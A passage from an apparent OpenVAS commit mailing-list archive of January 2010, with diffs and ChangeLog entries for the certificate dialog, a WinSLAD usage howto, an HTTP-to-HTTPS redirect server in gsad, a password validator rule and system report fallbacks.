ctrls = emalloc (sizeof (*ctrls)); GtkWidget * w; GtkWidget * vbox, *hbox; GtkWidget * label, *text, *sep, *button; GtkWidget* scrollwin; - + w = gtk_window_new(GTK_WINDOW_TOPLEVEL); gtk_window_set_default_size(GTK_WINDOW(w), 640, 480); gtk_window_set_position(GTK_WINDOW(w), GTK_WIN_POS_CENTER); gtk_widget_realize(w); arg_add_value(ctrls, "WINDOW", ARG_PTR, -1, w); - + vbox = gtk_vbox_new(FALSE, 5); gtk_container_add(GTK_CONTAINER(w), vbox); gtk_widget_show(vbox); - + label = gtk_label_new(_("This certificate has never been shown before. \ Here it is:")); gtk_box_pack_start(GTK_BOX(vbox), label, FALSE, FALSE, 5); gtk_widget_show(label); - + /* Initialize scroll area */ scrollwin = gtk_scrolled_window_new(NULL, NULL); - gtk_scrolled_window_set_policy( GTK_SCROLLED_WINDOW (scrollwin), + gtk_scrolled_window_set_policy (GTK_SCROLLED_WINDOW (scrollwin), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_box_pack_start(GTK_BOX(vbox), scrollwin, TRUE, TRUE, 0); - + /* Initialize text view */ text = gtk_text_view_new(); gtk_text_view_set_editable(GTK_TEXT_VIEW(text), FALSE); @@ -298,17 +281,17 @@ GtkTextBuffer* textbuffer; textbuffer = gtk_text_view_get_buffer(GTK_TEXT_VIEW(text)); gtk_text_buffer_set_text(textbuffer, cert, -1); - + /* Add and show scroll area and text view */ gtk_container_add(GTK_CONTAINER(scrollwin), text); - gtk_widget_show(text); + gtk_widget_show(text); gtk_widget_show(scrollwin); - + /* Seperator, buttons and callbacks */ sep = gtk_hseparator_new(); gtk_box_pack_start(GTK_BOX(vbox), sep, FALSE, FALSE, 0); gtk_widget_show(sep); - + label = gtk_label_new(_("Do you accept this certificate?")); gtk_box_pack_start(GTK_BOX(vbox), label, FALSE, FALSE, 0); gtk_widget_show(label); @@ -316,23 +299,23 @@ hbox = gtk_hbox_new(FALSE, 5); gtk_box_pack_start(GTK_BOX(vbox), hbox, FALSE, FALSE, 0); gtk_widget_show(hbox); - + button = gtk_button_new_with_label(_("Yes")); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); - g_signal_connect(GTK_OBJECT(button), "clicked", - GTK_SIGNAL_FUNC(showcert_accept_cb), ctrls); + g_signal_connect (GTK_OBJECT(button), "clicked", + GTK_SIGNAL_FUNC(showcert_accept_cb), ctrls); gtk_widget_show(button); - + button = gtk_button_new_with_label(_("No")); gtk_box_pack_start(GTK_BOX(hbox), button, TRUE, TRUE, 0); - g_signal_connect(GTK_OBJECT(button), "clicked", - GTK_SIGNAL_FUNC(showcert_refuse_cb), ctrls); + g_signal_connect (GTK_OBJECT(button), "clicked", + GTK_SIGNAL_FUNC(showcert_refuse_cb), ctrls); gtk_widget_show(button); - + g_signal_connect (G_OBJECT (w), "destroy", GTK_SIGNAL_FUNC(showcert_refuse_cb), ctrls); - + gtk_widget_show(w); gtk_window_set_modal(GTK_WINDOW(w), TRUE); return ctrls; @@ -343,13 +326,14 @@ /** - * Shows the SSL certificate to the user. + * @brief Shows the SSL certificate to the user. * * @param ssl The ssl connection + * * @return 0 if the certificate is accepted, -1 if the certificate is invalid. - */ + */ int -sslui_check_cert(gnutls_session_t ssl) +sslui_check_cert (gnutls_session_t ssl) { char * ascii_cert = NULL; int x; @@ -366,19 +350,18 @@ gnutls_datum_t out; int ret; - gnutls_x509_crt_init (&cert); + gnutls_x509_crt_init (&cert); gnutls_x509_crt_import (cert, &cert_list[0], GNUTLS_X509_FMT_DER); ret = gnutls_x509_crt_print (cert, GNUTLS_CRT_PRINT_FULL, &out); if (ret == GNUTLS_E_SUCCESS) { ascii_cert = emalloc (1 + out.size); - memcpy(ascii_cert, out.data, out.size); + memcpy (ascii_cert, out.data, out.size); gnutls_free (out.data); } gnutls_x509_crt_deinit (cert); } - } if (ascii_cert == NULL) @@ -387,15 +370,15 @@ sprintf(ascii_cert, _("This certificate has never been seen before and can't be shown\n")); } - -#ifdef USE_GTK + +#ifdef USE_GTK if(!F_quiet_mode) { int ret; - struct arglist * ctrls = sslui_showcert(ascii_cert); + struct arglist * ctrls = sslui_showcert (ascii_cert); efree(&ascii_cert); gtk_main(); - ret = GPOINTER_TO_SIZE(arg_get_value(ctrls, "RESULT")); + ret = GPOINTER_TO_SIZE (arg_get_value(ctrls, "RESULT")); arg_free(ctrls); if(ret) return 0; @@ -403,21 +386,20 @@ return -1; } #endif + fprintf(stderr, "%s\n", ascii_cert); fprintf(stderr, _("Do you accept it? (y/n) ")); fflush(stderr); do { x = getchar(); } while (x != EOF && x !='y' && x != 'n'); - + return (x == 'y') ? 0:-1; } - - + char* sslui_ask_trusted_ca_path() { return NULL; } - From scm-commit at wald.intevation.org Fri Jan 8 09:30:33 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 8 Jan 2010 09:30:33 +0100 (CET) Subject: [Openvas-commits] r6345 - in trunk/openvas-client: . openvas Message-ID: <20100108083033.7D316865F498@pyrosoma.intevation.org> Author: felix Date: 2010-01-08 09:30:31 +0100 (Fri, 08 Jan 2010) New Revision: 6345 Modified: trunk/openvas-client/ChangeLog trunk/openvas-client/openvas/sslui.c Log: * openvas/sslui.c: Include gnutls also if configured without GTK. Modified: trunk/openvas-client/ChangeLog =================================================================== --- trunk/openvas-client/ChangeLog 2010-01-08 08:29:34 UTC (rev 6344) +++ trunk/openvas-client/ChangeLog 2010-01-08 08:30:31 UTC (rev 6345) @@ -1,5 +1,9 @@ 2010-01-08 Felix Wolfsteller + * openvas/sslui.c: Include gnutls also if configured without GTK. + +2010-01-08 Felix Wolfsteller + * openvas/sslui.c: Cosmetics. 2009-12-21 Felix Wolfsteller Modified: trunk/openvas-client/openvas/sslui.c =================================================================== --- trunk/openvas-client/openvas/sslui.c 2010-01-08 08:29:34 UTC (rev 6344) +++ trunk/openvas-client/openvas/sslui.c 2010-01-08 08:30:31 UTC (rev 6345) @@ -20,15 +20,15 @@ */ #include +#include + #include "openvas_i18n.h" - #include "globals.h" #ifdef USE_GTK #include "gtk-compat.h" #include #include -#include /*-------------------------------------------------------------------------*/ From scm-commit at wald.intevation.org Fri Jan 8 10:25:26 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 8 Jan 2010 10:25:26 +0100 (CET) Subject: [Openvas-commits] r6346 - trunk/winslad Message-ID: <20100108092526.006A8865F46C@pyrosoma.intevation.org> Author: jan Date: 2010-01-08 10:25:26 +0100 (Fri, 08 Jan 2010) New Revision: 6346 Added: trunk/winslad/howto-winslad-via-gsa.txt Modified: trunk/winslad/ChangeLog Log: * howto-winslad-via-gsa.txt: New. Modified: trunk/winslad/ChangeLog =================================================================== --- trunk/winslad/ChangeLog 2010-01-08 08:30:31 UTC (rev 6345) +++ trunk/winslad/ChangeLog 2010-01-08 09:25:26 UTC (rev 6346) @@ -1,3 +1,7 @@ +2010-01-08 Jan-Oliver Wagner + + * howto-winslad-via-gsa.txt: New. + 2010-01-06 Michael Wiegand Post release version bump. Added: trunk/winslad/howto-winslad-via-gsa.txt =================================================================== --- trunk/winslad/howto-winslad-via-gsa.txt 2010-01-08 08:30:31 UTC (rev 6345) +++ trunk/winslad/howto-winslad-via-gsa.txt 2010-01-08 09:25:26 UTC (rev 6346) @@ -0,0 +1,47 @@ +HOWTO use WinSLAD via GSA +========================= + +This is a very brief description +on how to use WinSLAD via the +Greenbone Security Assistant (GSA). + +Status: 20100108, tested with GSA 0.8.3 and +WindSLAD 0.5. + +INSTALLING WinSLAD +------------------ + +* Download the winslad-installer-.exe from + http://wald.intevation.org/frs/?group_id=29 + (Or build newer versions from the SVN) + +* Copy the installer to the target machine and install it there by double + clicking on the executable; quiet, non-interactive install is available by + executing "winslad-installer-.exe /S" on the Windows command line. + +* Depending on the configuration of the target machine, you may need to create a + firewall exception for port 22. This can be done for example through Control + Panel -> Security Center -> Manage security settings for Windows Firewall -> + Exceptions -> Add port... + + +USING WinSLAD with GSA +---------------------- + +* Create a scan config containing at least the "SLAD Run" and "SLAD Fetch + Results" NVTs from the "General" family; select the SLAD plugins you want to + run in the NVT preferences for "SLAD Run". Be aware that only a small number + of SLAD plugins are currently supported by WinSLAD. + +* Create credentials with the appropriate credentials for the SLAD daemon; + default credentials are slad/slad. + +* Create a target with those credentials. + +* Create a task using the scan config and target you just created. + +* Start the Task. The first run will generate a message in the report that the + SLAD plugins have been launched; subsequent executions of this task will + report a status message (if the SLAD plugin is still running) or the results + of the SLAD plugins you selected. + From scm-commit at wald.intevation.org Fri Jan 8 11:06:46 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 8 Jan 2010 11:06:46 +0100 (CET) Subject: [Openvas-commits] r6347 - trunk/winslad Message-ID: <20100108100646.B804F86607B7@pyrosoma.intevation.org> Author: mwiegand Date: 2010-01-08 11:06:45 +0100 (Fri, 08 Jan 2010) New Revision: 6347 Modified: trunk/winslad/ChangeLog trunk/winslad/howto-winslad-via-gsa.txt Log: * howto-winslad-via-gsa.txt: Fixed typo, improved usage guide. Modified: trunk/winslad/ChangeLog =================================================================== --- trunk/winslad/ChangeLog 2010-01-08 09:25:26 UTC (rev 6346) +++ trunk/winslad/ChangeLog 2010-01-08 10:06:45 UTC (rev 6347) @@ -1,3 +1,7 @@ +2010-01-08 Michael Wiegand + + * howto-winslad-via-gsa.txt: Fixed typo, improved usage guide. + 2010-01-08 Jan-Oliver Wagner * howto-winslad-via-gsa.txt: New. Modified: trunk/winslad/howto-winslad-via-gsa.txt =================================================================== --- trunk/winslad/howto-winslad-via-gsa.txt 2010-01-08 09:25:26 UTC (rev 6346) +++ trunk/winslad/howto-winslad-via-gsa.txt 2010-01-08 10:06:45 UTC (rev 6347) @@ -6,7 +6,7 @@ Greenbone Security Assistant (GSA). Status: 20100108, tested with GSA 0.8.3 and -WindSLAD 0.5. +WinSLAD 0.5. INSTALLING WinSLAD ------------------ @@ -28,20 +28,28 @@ USING WinSLAD with GSA ---------------------- -* Create a scan config containing at least the "SLAD Run" and "SLAD Fetch - Results" NVTs from the "General" family; select the SLAD plugins you want to - run in the NVT preferences for "SLAD Run". Be aware that only a small number - of SLAD plugins are currently supported by WinSLAD. +* Create two scan configs: + - Create a scan config containing only the "SLAD Run" NVT from the family + "General". Select the SLAD plugins you want to run in the NVT preferences + for "SLAD Run". Be aware that only a small number of SLAD plugins are + currently supported by WinSLAD. + - Create a scan config containing only the "SLAD Fetch Results" NVT from the + family "General". * Create credentials with the appropriate credentials for the SLAD daemon; default credentials are slad/slad. * Create a target with those credentials. -* Create a task using the scan config and target you just created. +* Create a two tasks using the scan configs and target you just created. The one + containing the "SLAD Run" NVT will be referred to as "Start SLAD" from here + on; the task containing the "SLAD Fetch Results" will be referred to as "Get + SLAD Results". -* Start the Task. The first run will generate a message in the report that the - SLAD plugins have been launched; subsequent executions of this task will - report a status message (if the SLAD plugin is still running) or the results - of the SLAD plugins you selected. +* Start the Task called "Start SLAD". This run will generate a message in the + report that the SLAD plugins have been launched. +* Once the "Start SLAD" task has completed, you may start the "Get SLAD Results" + task. Subsequent executions of this task will report a status message (if the + SLAD plugin is still running) or the results of the SLAD plugins you selected. + From scm-commit at wald.intevation.org Fri Jan 8 11:42:28 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 8 Jan 2010 11:42:28 +0100 (CET) Subject: [Openvas-commits] r6348 - in trunk/gsa: . src Message-ID: <20100108104228.5325286607B7@pyrosoma.intevation.org> Author: mattm Date: 2010-01-08 11:42:27 +0100 (Fri, 08 Jan 2010) New Revision: 6348 Modified: trunk/gsa/ChangeLog trunk/gsa/src/gsad.c Log: * src/gsad.c (DEFAULT_GSAD_REDIRECT_PORT, MAX_HOST_LEN): New defines. (redirect_location): New variable. (redirect_handler): New function. (main): Add options --rport and --redirect. If --redirect is present then fork an HTTP server that redirects any request to the HTTPS server. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-08 10:06:45 UTC (rev 6347) +++ trunk/gsa/ChangeLog 2010-01-08 10:42:27 UTC (rev 6348) @@ -1,5 +1,19 @@ +2010-01-08 Matthew Mundell + + * src/gsad.c (DEFAULT_GSAD_REDIRECT_PORT, MAX_HOST_LEN): New defines. + (redirect_location): New variable. + (redirect_handler): New function. + (main): Add options --rport and --redirect. If --redirect is present then + fork an HTTP server that redirects any request to the HTTPS server. + 2010-01-07 Matthew Mundell + Add HTTP to HTTPS redirection. + + * src/gsad_omp.c (get_system_reports_omp, get_system_report_omp): New + +2010-01-07 Matthew Mundell + Add performance reports page. * src/gsad_omp.c (get_system_reports_omp, get_system_report_omp): New Modified: trunk/gsa/src/gsad.c =================================================================== --- trunk/gsa/src/gsad.c 2010-01-08 10:06:45 UTC (rev 6347) +++ trunk/gsa/src/gsad.c 2010-01-08 10:42:27 UTC (rev 6348) @@ -70,6 +70,11 @@ #define DEFAULT_GSAD_PORT 443 /** + * @brief Fallback GSAD port. + */ +#define DEFAULT_GSAD_REDIRECT_PORT 80 + +/** * @brief Fallback Administrator port. */ #define DEFAULT_OPENVAS_ADMINISTRATOR_PORT 9393 @@ -116,6 +121,11 @@ */ struct MHD_Daemon *gsad_daemon; +/** + * @brief Location for redirection server. + */ +gchar *redirect_location = NULL; + /** @todo Ensure the accesses to these are thread safe. */ /** @@ -2205,6 +2215,8 @@ return ret; } +#define MAX_HOST_LEN 1000 + /** * @brief HTTP request handler for GSAD. * @@ -2223,6 +2235,80 @@ * @return MHD_NO in case of problems. MHD_YES if all is OK. */ int +redirect_handler (void *cls, struct MHD_Connection *connection, + const char *url, const char *method, + const char *version, const char *upload_data, + size_t *upload_data_size, void **con_cls) +{ + gchar *location; + const char *host; + char name[MAX_HOST_LEN + 1]; + + /* Never respond on first call of a GET. */ + if ((!strcmp (method, "GET")) && *con_cls == NULL) + { + struct gsad_connection_info *con_info; + + // @todo what frees this? + con_info = calloc (1, sizeof (struct gsad_connection_info)); + if (NULL == con_info) + return MHD_NO; + + con_info->connectiontype = 2; + + *con_cls = (void *) con_info; + return MHD_YES; + } + + /* If called with undefined URL, abort request handler. */ + if (&url[0] == NULL) + return MHD_NO; + + /* Only accept GET and POST methods and send ERROR_PAGE in other cases. */ + if (strcmp (method, "GET") && strcmp (method, "POST")) + /** @todo return MHD_NO;? */ + send_response (connection, ERROR_PAGE, MHD_HTTP_METHOD_NOT_ACCEPTABLE); + + /* Redirect every URL to the default file on the HTTPS port. */ + host = MHD_lookup_connection_value (connection, + MHD_HEADER_KIND, + "Host"); + if (host == NULL) + return MHD_NO; + /* host.name:port */ + if (sscanf (host, "%" G_STRINGIFY(MAX_HOST_LEN) "[^:]:%*i", name) == 1) + location = g_strdup_printf (redirect_location, name); + else + location = g_strdup_printf (redirect_location, host); + if (send_redirect_header (connection, location) == MHD_NO) + { + g_free (location); + return MHD_NO; + } + g_free (location); + return MHD_YES; +} + +#undef MAX_HOST_LEN + +/** + * @brief HTTPS request handler for GSAD. + * + * This routine is the secure callback request handler for microhttpd. + * + * @param[in] cls Not used for this callback. + * @param[in] connection Connection handle, e.g. used to send response. + * @param[in] url The URL requested. + * @param[in] method "GET" or "POST", others are disregarded. + * @param[in] version Not used for this callback. + * @param[in] upload_data Data used for POST requests. + * @param[in] upload_data_size Size of upload_data. + * @param[out] con_cls For exchange of connection-related data + * (here a struct gsad_connection_info). + * + * @return MHD_NO in case of problems. MHD_YES if all is OK. + */ +int request_handler (void *cls, struct MHD_Connection *connection, const char *url, const char *method, const char *version, const char *upload_data, @@ -2652,6 +2738,7 @@ { gchar *rc_name; int gsad_port = DEFAULT_GSAD_PORT; + int gsad_redirect_port = DEFAULT_GSAD_REDIRECT_PORT; int gsad_administrator_port = DEFAULT_OPENVAS_ADMINISTRATOR_PORT; int gsad_manager_port = DEFAULT_OPENVAS_MANAGER_PORT; @@ -2667,7 +2754,9 @@ static gboolean foreground = FALSE; static gboolean print_version = FALSE; + static gboolean redirect = FALSE; static gchar *gsad_port_string = NULL; + static gchar *gsad_redirect_port_string = NULL; static gchar *gsad_administrator_port_string = NULL; static gchar *gsad_manager_port_string = NULL; static gchar *ssl_private_key_filename = OPENVAS_SERVER_KEY; @@ -2687,6 +2776,12 @@ {"mport", 'm', 0, G_OPTION_ARG_STRING, &gsad_manager_port_string, "Use manager port number .", ""}, + {"rport", 'r', + 0, G_OPTION_ARG_STRING, &gsad_redirect_port_string, + "Redirect HTTP from this port number .", ""}, + {"redirect", 'R', + 0, G_OPTION_ARG_NONE, &redirect, + "Redirect HTTP to HTTPS.", NULL }, {"verbose", 'v', 0, G_OPTION_ARG_NONE, &verbose, "Print progress messages.", NULL }, @@ -2768,6 +2863,18 @@ } } + if (gsad_redirect_port_string) + { + /* flawfinder: ignore, for atoi boundaries are checked properly */ + gsad_redirect_port = atoi (gsad_redirect_port_string); + if (gsad_redirect_port <= 0 || gsad_redirect_port >= 65536) + { + g_critical ("%s: Redirect port must be a number between 0 and 65536\n", + __FUNCTION__); + exit (EXIT_FAILURE); + } + } + if (foreground == FALSE) { /* Fork into the background. */ @@ -2790,6 +2897,31 @@ } } + if (gsad_redirect_port_string) + { + /* Fork for the redirect server. */ + tracef ("Forking for redirect...\n"); + pid_t pid = fork (); + switch (pid) + { + case 0: + /* Child. */ + redirect = TRUE; + redirect_location = g_strdup_printf ("https://%%s:%i/login/login.html", + gsad_port); + break; + case -1: + /* Parent when error. */ + g_critical ("%s: Failed to fork for redirect!\n", __FUNCTION__); + exit (EXIT_FAILURE); + break; + default: + /* Parent. */ + redirect = FALSE; + break; + } + } + /* Register the cleanup function. */ if (atexit (&gsad_cleanup)) @@ -2808,62 +2940,91 @@ exit (EXIT_FAILURE); } - omp_init (gsad_manager_port); - oap_init (gsad_administrator_port); + if (redirect) + { + /* Start the HTTP to HTTPS redirect server. */ - int use_ssl = 1; - gchar *ssl_private_key = NULL; - gchar *ssl_certificate = NULL; - - if (use_ssl == 0) - { gsad_daemon = MHD_start_daemon (MHD_USE_THREAD_PER_CONNECTION | MHD_USE_DEBUG, - gsad_port, NULL, NULL, &request_handler, + gsad_redirect_port, NULL, NULL, &redirect_handler, NULL, MHD_OPTION_NOTIFY_COMPLETED, free_resources, NULL, MHD_OPTION_END); + + if (gsad_daemon == NULL) + { + g_critical ("%s: MHD_start_daemon failed (redirector)!\n", __FUNCTION__); + return EXIT_FAILURE; + } + else + { + /** @todo Add g_critical. */ + if (pidfile_create ("gsad")) exit (EXIT_FAILURE); + + tracef ("GSAD started successfully and is redirecting on port %d.\n", + gsad_redirect_port); + } } else { - if (!g_file_get_contents (ssl_private_key_filename, &ssl_private_key, - NULL, NULL)) + int use_ssl = 1; + gchar *ssl_private_key = NULL; + gchar *ssl_certificate = NULL; + + /* Start the real, HTTPS server. */ + + omp_init (gsad_manager_port); + oap_init (gsad_administrator_port); + + if (use_ssl == 0) { - g_critical ("%s: Could not load private SSL key from %s!\n", - __FUNCTION__, - ssl_private_key_filename); - exit (EXIT_FAILURE); + gsad_daemon = MHD_start_daemon (MHD_USE_THREAD_PER_CONNECTION | MHD_USE_DEBUG, + gsad_port, NULL, NULL, &request_handler, + NULL, MHD_OPTION_NOTIFY_COMPLETED, + free_resources, NULL, MHD_OPTION_END); } + else + { + if (!g_file_get_contents (ssl_private_key_filename, &ssl_private_key, + NULL, NULL)) + { + g_critical ("%s: Could not load private SSL key from %s!\n", + __FUNCTION__, + ssl_private_key_filename); + exit (EXIT_FAILURE); + } - if (!g_file_get_contents (ssl_certificate_filename, &ssl_certificate, - NULL, NULL)) + if (!g_file_get_contents (ssl_certificate_filename, &ssl_certificate, + NULL, NULL)) + { + g_critical ("%s: Could not load SSL certificate from %s!\n", + __FUNCTION__, + ssl_certificate_filename); + exit (EXIT_FAILURE); + } + + gsad_daemon = + MHD_start_daemon (MHD_USE_THREAD_PER_CONNECTION | MHD_USE_SSL | MHD_USE_DEBUG, + gsad_port, NULL, NULL, &request_handler, NULL, + MHD_OPTION_HTTPS_MEM_KEY, ssl_private_key, + MHD_OPTION_HTTPS_MEM_CERT, ssl_certificate, + MHD_OPTION_NOTIFY_COMPLETED, free_resources, NULL, + MHD_OPTION_END); + } + + if (gsad_daemon == NULL) { - g_critical ("%s: Could not load SSL certificate from %s!\n", - __FUNCTION__, - ssl_certificate_filename); - exit (EXIT_FAILURE); + g_critical ("%s: MHD_start_daemon failed!\n", __FUNCTION__); + return EXIT_FAILURE; } + else + { + /** @todo Add g_critical. */ + if (pidfile_create ("gsad")) exit (EXIT_FAILURE); - gsad_daemon = - MHD_start_daemon (MHD_USE_THREAD_PER_CONNECTION | MHD_USE_SSL | MHD_USE_DEBUG, - gsad_port, NULL, NULL, &request_handler, NULL, - MHD_OPTION_HTTPS_MEM_KEY, ssl_private_key, - MHD_OPTION_HTTPS_MEM_CERT, ssl_certificate, - MHD_OPTION_NOTIFY_COMPLETED, free_resources, NULL, - MHD_OPTION_END); + tracef ("GSAD started successfully and is listening on port %d.\n", + gsad_port); + } } - if (gsad_daemon == NULL) - { - g_critical ("%s: MHD_start_daemon failed!\n", __FUNCTION__); - return EXIT_FAILURE; - } - else - { - if (pidfile_create("gsad")) exit (EXIT_FAILURE); - - tracef ("GSAD started successfully and is listening on port %d.\n", - gsad_port); - } - /* Wait forever for input or interrupts. */ while (1) From scm-commit at wald.intevation.org Fri Jan 8 11:58:16 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 8 Jan 2010 11:58:16 +0100 (CET) Subject: [Openvas-commits] r6349 - in trunk/gsa: . src Message-ID: <20100108105816.B9FC186607BA@pyrosoma.intevation.org> Author: mattm Date: 2010-01-08 11:58:15 +0100 (Fri, 08 Jan 2010) New Revision: 6349 Modified: trunk/gsa/ChangeLog trunk/gsa/src/gsad.c trunk/gsa/src/gsad_omp.c Log: * src/gsad_omp.c (create_lsc_credential_omp): Add check for password validation failure. * src/gsad.c (init_validator): Add rule "lsc_password". (exec_omp_post): Verify create_lsc_credential_omp password with "lsc_password". Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-08 10:42:27 UTC (rev 6348) +++ trunk/gsa/ChangeLog 2010-01-08 10:58:15 UTC (rev 6349) @@ -1,5 +1,16 @@ 2010-01-08 Matthew Mundell + * src/gsad_omp.c (create_lsc_credential_omp): Add check for password + validation failure. + + * src/gsad.c (init_validator): Add rule "lsc_password". + (exec_omp_post): Verify create_lsc_credential_omp password with + "lsc_password". + +2010-01-08 Matthew Mundell + + Add HTTP to HTTPS redirection. + * src/gsad.c (DEFAULT_GSAD_REDIRECT_PORT, MAX_HOST_LEN): New defines. (redirect_location): New variable. (redirect_handler): New function. @@ -8,12 +19,6 @@ 2010-01-07 Matthew Mundell - Add HTTP to HTTPS redirection. - - * src/gsad_omp.c (get_system_reports_omp, get_system_report_omp): New - -2010-01-07 Matthew Mundell - Add performance reports page. * src/gsad_omp.c (get_system_reports_omp, get_system_report_omp): New Modified: trunk/gsa/src/gsad.c =================================================================== --- trunk/gsa/src/gsad.c 2010-01-08 10:42:27 UTC (rev 6348) +++ trunk/gsa/src/gsad.c 2010-01-08 10:58:15 UTC (rev 6349) @@ -229,6 +229,8 @@ openvas_validator_add (validator, "hosts", "^[[:alnum:], \\./]{1,80}$"); openvas_validator_add (validator, "levels", "^(h|m|l|g){0,4}$"); openvas_validator_add (validator, "login", "^[[:alnum:]]{1,10}$"); + /** @todo Because we fear injections, we're requiring weaker passwords! */ + openvas_validator_add (validator, "lsc_password", "^[-_[:alnum:], ;:\\./]{0,40}$"); openvas_validator_add (validator, "max_result", "^[0-9]+$"); openvas_validator_add (validator, "name", "^[-_[:alnum:], \\./]{1,80}$"); openvas_validator_add (validator, "number", "^[0-9]+$"); @@ -1399,7 +1401,7 @@ con_info->req_parms.name = NULL; } if (openvas_validate (validator, - "password", + "lsc_password", con_info->req_parms.password)) { free (con_info->req_parms.password); Modified: trunk/gsa/src/gsad_omp.c =================================================================== --- trunk/gsa/src/gsad_omp.c 2010-01-08 10:42:27 UTC (rev 6348) +++ trunk/gsa/src/gsad_omp.c 2010-01-08 10:58:15 UTC (rev 6349) @@ -805,6 +805,8 @@ if (name == NULL || comment == NULL || login == NULL) g_string_append (xml, GSAD_MESSAGE_INVALID_PARAM ("Create Credential")); + else if (type && strcmp (type, "gen") && password == NULL) + g_string_append (xml, GSAD_MESSAGE_INVALID_PARAM ("Create Credential")); else { int ret; From scm-commit at wald.intevation.org Fri Jan 8 12:38:03 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 8 Jan 2010 12:38:03 +0100 (CET) Subject: [Openvas-commits] r6350 - in trunk/gsa: . src/html/src/help Message-ID: <20100108113803.56AB686607BC@pyrosoma.intevation.org> Author: mattm Date: 2010-01-08 12:38:01 +0100 (Fri, 08 Jan 2010) New Revision: 6350 Added: trunk/gsa/src/html/src/help/performance.htm4 Modified: trunk/gsa/ChangeLog Log: * src/html/src/help/performance.htm4: New file. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-08 10:58:15 UTC (rev 6349) +++ trunk/gsa/ChangeLog 2010-01-08 11:38:01 UTC (rev 6350) @@ -1,5 +1,9 @@ 2010-01-08 Matthew Mundell + * src/html/src/help/performance.htm4: New file. + +2010-01-08 Matthew Mundell + * src/gsad_omp.c (create_lsc_credential_omp): Add check for password validation failure. Added: trunk/gsa/src/html/src/help/performance.htm4 =================================================================== --- trunk/gsa/src/html/src/help/performance.htm4 2010-01-08 10:58:15 UTC (rev 6349) +++ trunk/gsa/src/html/src/help/performance.htm4 2010-01-08 11:38:01 UTC (rev 6350) @@ -0,0 +1,22 @@ +m4_define(`PAGE_TITLE', `Help: Performance') +m4_include(`header.m4') + + +
            + + +

            Performance

            + +

            +This page provides a system performance overview. +

            + +

            +A number of graphs summarize the performance of the hardware and +operating system. Initially the graphs summarize the past day of +activity. At the top of the dialog are links to other time periods, +like the past hour and month. +

            + +m4_include(`footer.m4') From scm-commit at wald.intevation.org Fri Jan 8 18:56:11 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 8 Jan 2010 18:56:11 +0100 (CET) Subject: [Openvas-commits] r6351 - in trunk/openvas-manager: . src Message-ID: <20100108175611.0476986607BB@pyrosoma.intevation.org> Author: mattm Date: 2010-01-08 18:56:10 +0100 (Fri, 08 Jan 2010) New Revision: 6351 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/README trunk/openvas-manager/src/manage.c Log: * src/manage.c (manage_system_report): If the graph is empty, try get the "blank" graph. * INSTALL: Add note about openvasmr blank type. * README: Add space. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2010-01-08 11:38:01 UTC (rev 6350) +++ trunk/openvas-manager/ChangeLog 2010-01-08 17:56:10 UTC (rev 6351) @@ -1,3 +1,12 @@ +2010-01-08 Matthew Mundell + + * src/manage.c (manage_system_report): If the graph is empty, try get + the "blank" graph. + + * INSTALL: Add note about openvasmr blank type. + + * README: Add space. + 2010-01-07 Matthew Mundell Add OMP command GET_SYSTEM_REPORTS. Modified: trunk/openvas-manager/README =================================================================== --- trunk/openvas-manager/README 2010-01-08 11:38:01 UTC (rev 6350) +++ trunk/openvas-manager/README 2010-01-08 17:56:10 UTC (rev 6351) @@ -7,7 +7,7 @@ unnecessary for scan clients to keep connection until a scan finishes. OpenVAS-Manager is licensed under GNU General Public License Version 2 or -any later version. Please see file COPYING for details. +any later version. Please see file COPYING for details. All parts of OpenVAS-Manager are Copyright (C) by Greenbone Networks GmbH (see http://www.greenbone.net). Modified: trunk/openvas-manager/src/manage.c =================================================================== --- trunk/openvas-manager/src/manage.c 2010-01-08 11:38:01 UTC (rev 6350) +++ trunk/openvas-manager/src/manage.c 2010-01-08 17:56:10 UTC (rev 6351) @@ -1460,6 +1460,9 @@ gint exit_status; gchar *command; + assert (name); + assert (duration); + /* For simplicity, it's up to the command to do the base64 encoding. */ command = g_strdup_printf ("openvasmr %s %s", duration, name); @@ -1482,11 +1485,16 @@ g_free (command); return -1; } - if (astdout) - *report = astdout; - else - *report = NULL; g_free (astderr); g_free (command); + if (astdout == NULL || strlen (astdout) == 0) + { + g_free (astdout); + if (strcmp (name, "blank") == 0) + return -1; + return manage_system_report ("blank", duration, report); + } + else + *report = astdout; return 0; } From scm-commit at wald.intevation.org Fri Jan 8 18:57:40 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Fri, 8 Jan 2010 18:57:40 +0100 (CET) Subject: [Openvas-commits] r6352 - trunk/openvas-manager Message-ID: <20100108175740.79B4986607BB@pyrosoma.intevation.org> Author: mattm Date: 2010-01-08 18:57:40 +0100 (Fri, 08 Jan 2010) New Revision: 6352 Modified: trunk/openvas-manager/INSTALL Log: Missed file in last last commit: * INSTALL: Add note about openvasmr blank type. Modified: trunk/openvas-manager/INSTALL =================================================================== --- trunk/openvas-manager/INSTALL 2010-01-08 17:56:10 UTC (rev 6351) +++ trunk/openvas-manager/INSTALL 2010-01-08 17:57:40 UTC (rev 6352) @@ -67,4 +67,7 @@ script must print a list of possible types, where the name of the type is everything up to the first space and everything else is a title for the report. When called with one of these types openvasmr - must print a PNG in base64 encoding. + must print a PNG in base64 encoding. When called with the special + type "blank", openvasmr must print a PNG in base64 for the Manager to + use when a request for one of the titled types fails. openvasmr may + indicate failure by simply refraining from printing. From scm-commit at wald.intevation.org Sat Jan 9 09:45:17 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Sat, 9 Jan 2010 09:45:17 +0100 